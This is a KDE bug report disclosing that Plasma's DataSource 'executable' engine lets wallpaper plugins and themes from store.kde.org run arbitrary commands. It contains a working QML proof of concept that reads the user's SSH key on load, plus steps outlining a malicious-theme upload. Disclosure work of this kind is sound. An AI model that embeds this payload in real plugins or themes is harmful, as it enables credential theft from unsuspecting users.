https://bugs.kde.org/show_bug.cgi?id=480112
Bug ID: 480112 Summary: PlasmaCore.DataSource "executable" engine arbitrary code execution via any QML file in backdoored wallpaper plugins, themes, etc. distributed via store.kde.org Classification: Plasma Product: plasmashell Version: 5.27.10 Platform: Other OS: Linux Status: REPORTED Severity: normal Priority: NOR Component: general Assignee: plasma-b...@kde.org Reporter: benjaminfle...@icloud.com CC: k...@davidedmundson.co.uk, secur...@kde.org Target Milestone: 1.0 SUMMARY *** PlasmaCore.DataSource offers the "executable" engine which allows malicious packages from store.kde.org to execute arbitrary code through QML files embededded in themes, wallpaper pugins, and more. This is a critical design problem of PlasmaCore.DataSource which gets exaberated by the lack of security auditing at store.kde.org (with no malware scanning as demonstrated by finding various malicious .exe files embedded in archives distributed via the KDE in the recent days), and the tight integration of the store.kde.org system into the plasma interface. Users can right click on the desktop, click "configure desktop and wallpaper", then click "get new plugins" and the "download new wallpaper plugins - plasma" shopping dialog pops up. By default, this shop is sorted by "most recent", which makes it very easy for an attacker to get initial infections. You can hover any listing in the window and an "install" button shows up in the plasma interface. After you click install, the user can immediately click "run" to execute the user-generated, untrusted package containing QML code with the potential for arbitrary code execution and arbitrary reading in the context of the user. *** The KDE devs are aware of this problem, because in QML context, a XMLHTTPRequest to read the SSH private key from ~/.ssh/id_rsa.pub is rejected with error: "XMLHttpRequest: Using GET on a local file is dangerous and will be disabled by default in a future Qt version.Set QML_XHR_ALLOW_FILE_READ to 1 if you wish to continue using this feature." ``` var xhr = new XMLHttpRequest; xhr.open("GET", "~/.ssh/id_rsa.pub"); xhr.onreadystatechange = function() { if (xhr.readyState == XMLHttpRequest.DONE) { var response = xhr.responseText; // use file contents as required console.log(response) } }; xhr.send(); ``` However, in plain QML you can execute arbitrary commands and read arbitrary user data with the the following `config.qml` embedded for example in an "plasma wallpaper plugin". Then a backdoored theme package downloaded from store.kde.org could send this data to an attack-controlled server. ``` import QtQuick 2.1 import QtQuick.Layouts 1.1 import QtQuick.Controls 2.8 import org.kde.plasma.core 2.0 as PlasmaCore import org.kde.kirigami 2.4 as Kirigami Item { id: page width: childrenRect.width height: childrenRect.height property alias cfg_start_branches : start_branches.value; property alias cfg_scale : scale.value; PlasmaCore.DataSource { id: executable engine: "executable" connectedSources: [] onNewData: { var exitCode = data["exit code"] var exitStatus = data["exit status"] var stdout = data["stdout"] var stderr = data["stderr"] exited(sourceName, exitCode, exitStatus, stdout, stderr) disconnectSource(sourceName) // cmd finished } function exec(cmd) { connectSource(cmd) } signal exited(string command, int exitCode, int exitStatus, string stdout, string stderr) } Connections { target: executable onExited: { console.log("onExited stdout", stdout) } } Component.onCompleted: { executable.exec("/usr/bin/cat ~/.ssh/id_rsa.pub") } Kirigami.FormLayout { anchors.left: parent.left anchors.right: parent.right // Label { // anchors.verticalCenter: parent.verticalCenter // rightPadding: 15 // text: i18n("Start Branches") + " (" + start_branches.value + ")" // } PlasmaComponents.Slider { id: start_branches Kirigami.FormData.label: i18n("Stat Branches123123 (%1)", start_branches.value) from: 1 to: 10 value: 3 snapMode: Slider.SnapAlways stepSize: 1 } // Label { // anchors.verticalCenter: parent.verticalCenter // rightPadding: 15 // text: i18n("Scale (%1)", scale.value) // } PlasmaComponents.Slider { id: scale Kirigami.FormData.label: i18n("Scale (%1)", scale.value) from: 1 to: 10 value: 3 snapMode: Slider.SnapAlways stepSize: 1 } } } ``` In recent days this issue was thoroughly discussed on #plasma and some of it on #kde, and it feels to me there is a lack of awareness of this issue. The handing over of the maintenance obligations of the store.kde.org to a private company "plink gmbh" which is CNAME'd behind the trustworthy store.kde.org domain is a separation of ownership that IMO has very grave security implications. KDE store / Plasma store should adapt their software design decisions and their governance procedures on the learnings from chrome extensions, npm modules, firefox extensions, etc. before a wide-reaching security breach happens. Possible attack scenarios: - targeted attacks on one user via backdoored theme - malicious theme update pushed via KDE discover's "addon update" functionality when store.kde.org (plink gmbh) is breached STEPS TO REPRODUCE 1. create theme 2. add malicious code to QML file that uploads ssh key to remote server 3. upload theme to store.kde.org 4. wait for kde users to install your theme package (wallpaper plugin) because it is listed as the first item they see ("most recent") OBSERVED RESULT users will get hacked or have already been hacked, but there is no monitoring and no security scanning procedures in place to actually know it. EXPECTED RESULT users do not get their SSH keys leaked because they download an "animated wallpaper" over the OS-integrated functionality SOFTWARE/OS VERSIONS kdeplasma-addons 5.27.10-2 plasma-browser-integration 5.27.10-1 plasma-desktop 5.27.10-1 plasma-disks 5.27.10-1 plasma-firewall 5.27.10-1 plasma-framework5 5.114.0-1 plasma-integration 5.27.10-1 plasma-meta 5.27-4 plasma-nm 5.27.10-1 plasma-pa 5.27.10-1 plasma-sdk 5.27.10-1 plasma-systemmonitor 5.27.10-1 plasma-thunderbolt 5.27.10-1 plasma-vault 5.27.10-1 plasma-wayland-session 5.27.10-2 plasma-welcome 5.27.10-1 plasma-workspace 5.27.10-2 plasma-workspace-wallpapers 5.27.10-1 plasmatube 23.08.4-1 -- You are receiving this mail because: You are watching all bug changes.